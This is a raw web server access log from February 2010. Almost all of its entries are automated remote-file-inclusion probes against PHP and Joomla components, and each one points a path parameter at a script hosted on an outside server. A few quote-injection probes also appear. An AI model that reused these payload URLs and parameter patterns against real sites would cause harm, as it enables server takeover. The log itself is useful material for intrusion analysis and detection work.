216.119.103.16 - - [19/Feb/2010:09:13:01 -0800] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:09:13:28 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://zonn.t35.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:09:13:28 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://zonn.t35.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:09:13:28 -0800] "GET /logs/access_100120.log//bbs//delete_comment.php?board_skin_path=http://zonn.t35.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:09:13:38 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://zonn.t35.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:09:13:38 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://zonn.t35.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:09:13:38 -0800] "GET /logs/access_100120.log%20%20//bbs//delete_comment.php?board_skin_path=http://zonn.t35.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:09:13:47 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://zonn.t35.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:09:13:47 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://zonn.t35.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:09:13:47 -0800] "GET /logs/access_100120.log%20%20//bbs//delete_comment.php?board_skin_path=http://zonn.t35.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [19/Feb/2010:09:13:58 -0800] "GET /logs/access_100125.log%20%20///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [19/Feb/2010:09:13:58 -0800] "GET /logs///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [19/Feb/2010:09:13:59 -0800] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [19/Feb/2010:09:14:32 -0800] "GET /logs/access_091210.log///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [19/Feb/2010:09:14:47 -0800] "GET /logs/access_100125.log///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [19/Feb/2010:09:14:47 -0800] "GET /logs///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [19/Feb/2010:09:14:47 -0800] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [19/Feb/2010:09:15:07 -0800] "GET /logs/access_100125.log///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [19/Feb/2010:09:15:07 -0800] "GET /logs///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [19/Feb/2010:09:15:07 -0800] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [19/Feb/2010:09:15:26 -0800] "GET /logs/access_100206.log%20%20///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [19/Feb/2010:09:16:03 -0800] "GET /logs/access_100206.log///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [19/Feb/2010:09:16:41 -0800] "GET /logs/access_100206.log///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [19/Feb/2010:09:18:04 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [19/Feb/2010:09:18:15 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:09:18:38 -0800] "GET /logs/access_100202.log//oneadmin/newspublish/include.php?path[docroot]=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:09:18:41 -0800] "GET /includes/mambo.php/mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:09:18:41 -0800] "GET /logs//includes/mambo.php/mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:09:18:41 -0800] "GET /logs/access_100204.log//includes/mambo.php/mosConfig_absolute_path=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [19/Feb/2010:09:18:58 -0800] "GET /logs/access_100204.log//modules/xfsection/modify.php?dir_module=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [19/Feb/2010:09:20:18 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [19/Feb/2010:09:20:18 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [19/Feb/2010:09:20:18 -0800] "GET /logs/access_100207.log%20%20//modules/xfsection/modify.php?dir_module=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [19/Feb/2010:09:20:28 -0800] "GET /logs/access_100123.log%20%20//components/com_pollxt/conf.pollxt.php/vidinas.net/t/variant-1.ru/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [19/Feb/2010:09:22:09 -0800] "GET /logs/access_100203.log%20%20///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [19/Feb/2010:09:22:10 -0800] "GET /logs///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [19/Feb/2010:09:22:10 -0800] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [19/Feb/2010:09:22:16 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [19/Feb/2010:09:22:16 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [19/Feb/2010:09:22:16 -0800] "GET /logs/access_100207.log%20%20//modules/xfsection/modify.php?dir_module=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:22:36 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:22:36 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:22:40 -0800] "GET /logs/access_100117.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:22:41 -0800] "GET /logs/access_100117.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [19/Feb/2010:09:22:52 -0800] "GET /logs/access_100123.log%20%20//components/com_pollxt/conf.pollxt.php/vidinas.net/t/variant-1.ru/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:22:52 -0800] "GET /logs/access_100205.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:22:54 -0800] "GET /logs/access_100205.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:09:22:56 -0800] "GET /logs///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:09:22:56 -0800] "GET /logs/access_100125.log%20%20///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:09:22:56 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ticcamp.co.kr/hex/idtasikfeel.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:09:22:57 -0800] "GET /logs/access_100121.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ticcamp.co.kr/hex/idtasikfeel.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:09:22:57 -0800] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:09:22:57 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ticcamp.co.kr/hex/idtasikfeel.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:09:23:00 -0800] "GET /logs///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:09:23:00 -0800] "GET /logs/access_100125.log///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:09:23:00 -0800] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [19/Feb/2010:09:23:23 -0800] "GET /logs/access_100115.log//oneadmin/newspublish/include.php?path[docroot]=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [19/Feb/2010:09:23:54 -0800] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [19/Feb/2010:09:23:58 -0800] "GET /logs/access_100203.log///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [19/Feb/2010:09:23:58 -0800] "GET /logs///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [19/Feb/2010:09:24:00 -0800] "GET /logs/access_100208.log///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [19/Feb/2010:09:24:25 -0800] "GET /logs/access_100204.log%20%20//modules/xfsection/modify.php?dir_module=http://www.sinhvienqb.com/news/idbun1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [19/Feb/2010:09:25:24 -0800] "GET /logs/access_100123.log%20%20//components/com_pollxt/conf.pollxt.php/vidinas.net/t/variant-1.ru/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:09:27:19 -0800] "GET /logs/access_100125.log///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:09:27:19 -0800] "GET /logs///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:09:27:19 -0800] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
124.49.100.254 - - [19/Feb/2010:09:29:16 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.49.100.254 - - [19/Feb/2010:09:29:16 -0800] "GET /logs/access_100125.log//modules/4nAlbum/public/displayCategory.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.49.100.254 - - [19/Feb/2010:09:29:16 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.49.100.254 - - [19/Feb/2010:09:29:31 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.49.100.254 - - [19/Feb/2010:09:29:31 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.49.100.254 - - [19/Feb/2010:09:29:31 -0800] "GET /logs/access_100125.log//modules/4nAlbum/public/displayCategory.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [19/Feb/2010:09:29:55 -0800] "GET /logs/access_100114.log%20%20//components/com_pollxt/conf.pollxt.php/vidinas.net/t/variant-1.ru/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:30:19 -0800] "GET /logs/access_100117.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:30:34 -0800] "GET /logs/access_100205.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:09:30:46 -0800] "GET /logs/access_100206.log%20%20///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:31:09 -0800] "GET /logs/access_100117.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:09:31:23 -0800] "GET /logs/access_100206.log///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.171.20.193 - - [19/Feb/2010:09:31:28 -0800] "GET /logs/access_100205.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.49.100.254 - - [19/Feb/2010:09:31:38 -0800] "GET /logs/access_100124.log//modules/4nAlbum/public/displayCategory.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.49.100.254 - - [19/Feb/2010:09:31:44 -0800] "GET /logs/access_100124.log//modules/4nAlbum/public/displayCategory.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [19/Feb/2010:09:32:18 -0800] "GET /logs/access_100125.log//bbs/delete_comment.php?board_skin_path=http://je0ab.com/morningform/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [19/Feb/2010:09:32:23 -0800] "GET /logs/access_100114.log%20%20//components/com_pollxt/conf.pollxt.php/vidinas.net/t/variant-1.ru/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [19/Feb/2010:09:32:51 -0800] "GET /logs/access_100120.log//bbs/delete_comment.php?board_skin_path=http://je0ab.com/morningform/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:09:33:07 -0800] "GET /logs/access_100120.log//cart2.php?workdir=' HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:09:33:07 -0800] "GET /cart2.php?workdir=' HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:09:33:08 -0800] "GET /logs//cart2.php?workdir=' HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:09:33:37 -0800] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:09:33:45 -0800] "GET /logs/access_100203.log///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:09:33:45 -0800] "GET /logs///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:09:33:45 -0800] "GET /logs/access_100208.log///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [19/Feb/2010:09:33:49 -0800] "GET /logs/access_100114.log%20%20//components/com_pollxt/conf.pollxt.php/vidinas.net/t/variant-1.ru/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:09:35:26 -0800] "GET /cart2.php?workdir=' HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
38.101.148.126 - - [19/Feb/2010:09:37:15 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [19/Feb/2010:09:37:16 -0800] "GET /orange_g/forum/viewtopic.php?p=28626 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
83.149.110.210 - - [19/Feb/2010:09:37:23 -0800] "GET /logs/access.log//bbs/delete_comment.php?board_skin_path=http://je0ab.com/morningform/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:09:38:56 -0800] "GET /logs/access_100203.log%20%20///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:09:38:57 -0800] "GET /logs///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:09:38:57 -0800] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [19/Feb/2010:09:38:57 -0800] "GET /logs/access_100218.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
94.23.0.61 - - [19/Feb/2010:09:41:08 -0800] "GET /logs/access_100117.log//?_zb_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.0.61 - - [19/Feb/2010:09:41:08 -0800] "GET /logs/access_100111.log//?_zb_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.0.61 - - [19/Feb/2010:09:41:08 -0800] "GET /logs//?_zb_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
94.23.0.61 - - [19/Feb/2010:09:41:09 -0800] "GET /?_zb_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
193.138.157.25 - - [19/Feb/2010:09:43:12 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.138.157.25 - - [19/Feb/2010:09:43:12 -0800] "GET /logs/access_100123.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.138.157.25 - - [19/Feb/2010:09:43:12 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.138.157.25 - - [19/Feb/2010:09:43:13 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.138.157.25 - - [19/Feb/2010:09:43:13 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.138.157.25 - - [19/Feb/2010:09:43:13 -0800] "GET /logs/access_100123.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.138.157.25 - - [19/Feb/2010:09:44:49 -0800] "GET /logs/access_100126.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://sman109-jkt.sch.id/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
